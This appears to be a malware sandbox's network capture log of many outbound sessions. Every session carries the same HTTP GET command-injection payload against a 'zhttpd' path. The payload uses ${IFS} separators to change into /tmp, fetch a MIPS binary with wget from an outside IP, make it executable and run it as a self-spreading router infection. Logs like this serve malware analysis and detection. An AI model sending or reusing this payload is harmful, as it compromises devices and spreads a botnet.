                                                Jan 12, 2024 18:24:52.252429962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8504192.168.2.133680235.44.185.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252492905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8505192.168.2.134491482.145.153.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252549887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8506192.168.2.1346322216.223.136.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252594948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8507192.168.2.135843017.225.176.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252661943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8508192.168.2.135584818.248.210.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252717972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8509192.168.2.1349226169.163.38.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252760887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8510192.168.2.135391243.236.143.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252816916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8511192.168.2.133724492.181.32.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252873898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8512192.168.2.135097665.126.216.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252958059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8513192.168.2.1343974165.55.209.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.252995014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8514192.168.2.1345342135.72.141.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253065109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8515192.168.2.1349932212.75.74.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253127098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8516192.168.2.134797637.21.179.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253156900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8517192.168.2.134092852.27.102.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253242016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8518192.168.2.1345424211.254.124.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253295898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8519192.168.2.135567825.75.151.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253344059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8520192.168.2.136059214.89.103.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253402948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8521192.168.2.1352770113.133.253.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253498077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8522192.168.2.134060046.17.21.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253539085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8523192.168.2.135941843.87.199.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253596067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8524192.168.2.135658462.36.172.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253640890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8525192.168.2.1359148168.201.53.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253686905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8526192.168.2.1346654100.193.159.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253752947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8527192.168.2.1360636113.108.98.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253807068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8528192.168.2.135148092.182.41.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253846884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8529192.168.2.133999840.4.173.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253915071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8530192.168.2.133319637.217.32.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.253964901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8531192.168.2.1360872184.148.96.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254035950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8532192.168.2.134136639.100.196.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254092932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8533192.168.2.1347368106.43.92.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254153013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8534192.168.2.134896276.27.135.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254200935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8535192.168.2.134582435.114.127.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254290104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8536192.168.2.1353370115.248.154.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254340887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8537192.168.2.1357144210.237.193.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254389048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8538192.168.2.133840699.94.136.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254462004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8539192.168.2.1333178131.200.153.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254501104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8540192.168.2.1342814125.42.212.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254559994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8541192.168.2.1358494151.55.230.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254614115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8542192.168.2.135410666.114.229.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254671097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8543192.168.2.13573742.181.147.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254734039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8544192.168.2.135359854.30.238.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254789114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8545192.168.2.1344482168.54.167.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254829884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8546192.168.2.1360920118.109.211.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254878998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8547192.168.2.1348436122.27.228.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254939079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8548192.168.2.1348610111.31.110.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.254977942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8549192.168.2.1332852116.129.215.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255029917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8550192.168.2.1344604166.46.222.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255110025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8551192.168.2.1342376208.68.92.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255148888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8552192.168.2.1343674187.76.60.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255198956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8553192.168.2.135408064.98.186.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255242109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8554192.168.2.134962898.96.91.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255314112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8555192.168.2.136007475.116.16.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255354881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8556192.168.2.1337664147.231.164.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255414963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8557192.168.2.134242232.73.113.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255475998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8558192.168.2.1349536101.189.252.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255541086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8559192.168.2.134464423.126.250.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255604029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8560192.168.2.134021899.120.91.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255636930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8561192.168.2.135102414.12.68.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255722046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8562192.168.2.1344144207.121.131.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255772114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8563192.168.2.1345566219.245.194.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255825996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8564192.168.2.1335660209.18.231.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255881071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8565192.168.2.1355282166.165.190.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:52.255914927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8566192.168.2.1335304222.49.115.68443
                                                TimestampBytes transferredDirectionData
